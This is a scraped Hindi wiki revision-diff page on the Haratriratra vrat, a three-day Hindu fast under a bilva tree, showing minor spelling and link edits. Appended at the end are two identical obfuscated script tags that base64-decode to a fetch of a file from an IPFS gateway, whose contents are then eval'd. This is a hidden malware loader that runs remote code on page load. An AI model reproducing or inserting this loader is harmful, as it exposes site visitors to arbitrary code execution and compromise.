Difference between revisions of "हरत्रिरात्र व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==सम्बंधित लिंक==" to "==संबंधित लेख==")
 
(4 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
*हरत्रिरात्रव्रत बिल्व वृक्ष के तले बैठकर तीन दिनों तक उपवास किया जाता है।
+
*हरत्रिरात्रव्रत [[बिल्व वृक्ष]] के तले बैठकर तीन दिनों तक उपवास किया जाता है।
*[[हर]] के नाम का एक लाख बार स्मरण करने से भ्रूणहत्या जैसे पाप भी कट जाते हैं।<ref>हेमाद्रि (व्रत खंड 2, 318, सौरपुराण से उद्धरण)</ref>
+
*[[हर]] के नाम का एक लाख बार स्मरण करने से भ्रूणहत्या जैसे पाप भी कट जाते हैं।<ref>हेमाद्रि (व्रत खंड 2, 318, सौरपुराण से उद्धरण</ref>
 +
 
 
{{लेख प्रगति
 
{{लेख प्रगति
 
|आधार=आधार1
 
|आधार=आधार1
Line 9: Line 10:
 
|शोध=
 
|शोध=
 
}}
 
}}
 +
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
Line 14: Line 16:
 
{{पर्व और त्योहार}}
 
{{पर्व और त्योहार}}
 
{{व्रत और उत्सव}}
 
{{व्रत और उत्सव}}
 
 
[[Category:व्रत और उत्सव]]
 
[[Category:व्रत और उत्सव]]
 
[[Category:संस्कृति कोश]]  
 
[[Category:संस्कृति कोश]]  
 
[[Category:पर्व और त्योहार]]
 
[[Category:पर्व और त्योहार]]
 
__INDEX__
 
__INDEX__

Latest revision as of 12:27, 2 June 2013

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • haratriratravrat bilv vriksh ke tale baithakar tin dinoan tak upavas kiya jata hai.
  • har ke nam ka ek lakh bar smaran karane se bhroonahatya jaise pap bhi kat jate haian.[1]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. hemadri (vrat khand 2, 318, saurapuran se uddharan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>